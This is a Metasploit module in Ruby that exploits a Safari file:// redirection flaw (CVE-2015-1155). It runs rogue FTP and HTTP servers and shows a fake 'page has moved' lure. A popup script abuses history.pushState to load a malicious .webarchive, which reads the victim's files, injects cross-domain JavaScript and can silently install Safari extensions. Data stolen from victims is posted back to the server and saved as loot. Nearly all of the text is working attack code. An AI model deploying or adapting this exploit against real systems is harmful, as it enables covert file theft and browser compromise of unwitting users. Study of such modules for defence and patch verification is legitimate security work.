Mac OS X Safari file:// Redirection Sandbox Escape

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::FtpServer  
include Msf::Exploit::Format::Webarchive  
include Msf::Auxiliary::Report  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Mac OS X Safari file:// Redirection Sandbox Escape',  
'Description' => %q{  
Versions of Safari before 8.0.6, 7.1.6, and 6.2.6 are vulnerable to a  
"state management issue" that allows a browser window to be navigated  
to a file:// URL. By dropping and loading a malicious .webarchive file,  
an attacker can read arbitrary files, inject cross-domain Javascript, and  
silently install Safari extensions.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'joev' # discovery, module  
],  
'References' => [  
['ZDI', '15-228'],  
['CVE', '2015-1155'],  
['URL', 'https://support.apple.com/en-us/HT204826']  
],  
'Platform' => 'osx',  
'DisclosureDate' => '2014-01-16'  
))  
  
  
register_options([  
OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),  
OptPort.new('SRVPORT', [true, "The local port to use for the FTP server", 8081]),  
OptPort.new('HTTPPORT', [true, "The HTTP server port", 8080])  
])  
end  
  
def lookup_lhost(c=nil)  
# Get the source address  
if datastore['SRVHOST'] == '0.0.0.0'  
Rex::Socket.source_address( c || '50.50.50.50')  
else  
datastore['SRVHOST']  
end  
end  
  
def on_request_uri(cli, req)  
if req.method =~ /post/i  
data_str = req.body.to_s  
begin  
data = JSON::parse(data_str || '')  
file = record_data(data, cli)  
send_response(cli, '')  
print_good "data #{data.keys.join(',')} received and stored to #{file}"  
rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up  
file = record_data(data_str, cli)  
print_error "Invalid JSON stored in #{file}"  
send_response(cli, '')  
end  
elsif req.uri =~ /#{popup_path}$/  
send_response(cli, 200, 'OK', popup_html)  
else  
send_response(cli, 200, 'OK', exploit_html)  
end  
end  
  
def ftp_user  
@ftp_user ||= Rex::Text.rand_text_alpha(6)  
end  
  
def ftp_pass  
@ftp_pass ||= Rex::Text.rand_text_alpha(6)  
end  
  
def exploit_html  
%Q|  
<html><body>  
<script>  
window.onclick = function() {  
window.open(window.location+'/#{popup_path}', 'x', 'width=1,height=1');  
}  
</script>  
The page has moved. <a href='#'>Click here</a> to be redirected.  
</body></html>  
|  
end  
  
def ftp_url  
"ftp://#{ftp_user}:#{ftp_pass}@#{lookup_lhost}:#{datastore['SRVPORT']}"  
end  
  
def popup_html  
%Q|  
<script>  
  
function perform() {  
if (arguments.length > 0) {  
var nextArgs = Array.prototype.slice.call(arguments, 1);  
arguments[0]();  
setTimeout(function() {  
perform.apply(null, nextArgs);  
}, 300);  
}  
}  
  
perform(  
function() { opener.location = 'http://localhost:99999'; },  
function() { history.pushState.call(opener.history, {}, {}, 'file:///'); },  
function() { opener.location = 'about:blank' },  
function() { opener.history.back(); },  
function() { window.location = '#{ftp_url}'; },  
function() { opener.location = 'http://localhost:99998'; },  
function() {  
history.pushState.call(  
opener.history, {}, {},  
'file:///Volumes/#{lookup_lhost}/#{payload_name}'  
);  
},  
function() { opener.location = 'about:blank'; },  
function() { opener.history.back(); },  
function() { if (#{datastore['INSTALL_EXTENSION']}) { opener.postMessage('EXT', '*'); window.location = '#{apple_extension_url}'; } else { window.close(); } }  
)  
  
</script>  
|  
end  
  
#  
# Handle FTP LIST request (send back the directory listing)  
#  
def on_client_command_list(c, arg)  
conn = establish_data_connection(c)  
if not conn  
c.put("425 Can't build data connection\r\n")  
return  
end  
  
print_status("Data connection setup")  
c.put("150 Here comes the directory listing\r\n")  
  
print_status("Sending directory list via data connection #{webarchive_size}")  
month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']  
m = month_names[Time.now.month-1]  
d = Time.now.day  
y = Time.now.year  
  
dir = "-rwxr-xr-x 1 ftp ftp #{webarchive_size} #{m} #{d} #{y} #{payload_name}\r\n"  
print_status dir  
conn.put(dir)  
conn.close  
  
print_status("Directory sent ok")  
c.put("226 Transfer ok\r\n")  
  
return  
end  
  
#  
# Handle the FTP RETR request. This is where we transfer our actual malicious payload  
#  
def on_client_command_retr(c, arg)  
conn = establish_data_connection(c)  
if not conn  
return c.put("425 can't build data connection\r\n")  
end  
  
print_status("Connection for file transfer accepted")  
c.put("150 Connection accepted\r\n")  
  
# Send out payload  
conn.put(webarchive)  
conn.close  
end  
  
def volume_name  
@volume_name ||= Rex::Text.rand_text_alpha(12)  
end  
  
def payload_name  
'msf.webarchive'  
end  
  
def popup_path  
@popup_uri ||= Rex::Text.rand_text_alpha(12)  
end  
  
def webarchive  
webarchive_xml  
end  
  
def webarchive_size  
print_status "Webarchive_SiZE=#{webarchive_xml.length}"  
webarchive_xml.length  
end  
  
def run  
# Start the FTP server  
print_status("Running FTP service...")  
start_service  
  
# Create our own HTTP server  
# We will stay in this function until we manually terminate execution  
start_http  
end  
  
#  
# Handle the HTTP request and return a response. Code borrorwed from:  
# msf/core/exploit/http/server.rb  
#  
def start_http(opts={})  
# Ensture all dependencies are present before initializing HTTP  
use_zlib  
  
comm = datastore['ListenerComm']  
if (comm.to_s == "local")  
comm = ::Rex::Socket::Comm::Local  
else  
comm = nil  
end  
  
# Default the server host / port  
opts = {  
'ServerHost' => datastore['SRVHOST'],  
'ServerPort' => datastore['HTTPPORT'],  
'Comm' => comm  
}.update(opts)  
  
# Start a new HTTP server  
@http_service = Rex::ServiceManager.start(  
Rex::Proto::Http::Server,  
opts['ServerPort'].to_i,  
opts['ServerHost'],  
datastore['SSL'],  
{  
'Msf' => framework,  
'MsfExploit' => self,  
},  
opts['Comm'],  
datastore['SSLCert']  
)  
  
@http_service.server_name = datastore['HTTP::server_name']  
  
# Default the procedure of the URI to on_request_uri if one isn't  
# provided.  
uopts = {  
'Proc' => Proc.new { |cli, req|  
on_request_uri(cli, req)  
},  
'Path' => resource_uri  
}.update(opts['Uri'] || {})  
  
proto = (datastore["SSL"] ? "https" : "http")  
print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")  
  
if (opts['ServerHost'] == '0.0.0.0')  
print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")  
end  
  
# Add path to resource  
@service_path = uopts['Path']  
@http_service.add_resource(uopts['Path'], uopts)  
  
# As long as we have the http_service object, we will keep the ftp server alive  
while @http_service  
select(nil, nil, nil, 1)  
end  
end  
  
#  
# Ensures that gzip can be used. If not, an exception is generated. The  
# exception is only raised if the DisableGzip advanced option has not been  
# set.  
#  
def use_zlib  
if !Rex::Text.zlib_present? && datastore['HTTP::compression']  
fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")  
end  
end  
  
#  
# Returns the configured (or random, if not configured) URI path  
#  
def resource_uri  
path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8+rand(8))  
path = '/' + path if path !~ /^\//  
datastore['URIPATH'] = path  
return path  
end  
  
#  
# Create an HTTP response and then send it  
#  
def send_response(cli, code, message='OK', html='')  
proto = Rex::Proto::Http::DefaultProtocol  
res = Rex::Proto::Http::Response.new(code, message, proto)  
res['Content-Type'] = 'text/html'  
res.body = html  
  
cli.send_response(res)  
end  
  
# @param [Hash] data the data to store in the log  
# @return [String] filename where we are storing the data  
def record_data(data, cli)  
name = if data.is_a?(Hash) then data.keys.first else 'data' end  
file = File.basename(name).gsub(/[^A-Za-z]/,'')  
store_loot(  
file, "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"  
)  
end  
  
#  
# Kill HTTP/FTP (shut them down and clear resources)  
#  
def cleanup  
super  
  
# Kill FTP  
cleanup_service  
  
# clear my resource, deregister ref, stop/close the HTTP socket  
begin  
@http_service.remove_resource(datastore['URIPATH'])  
@http_service.deref  
@http_service = nil  
rescue  
end  
end  
end  
`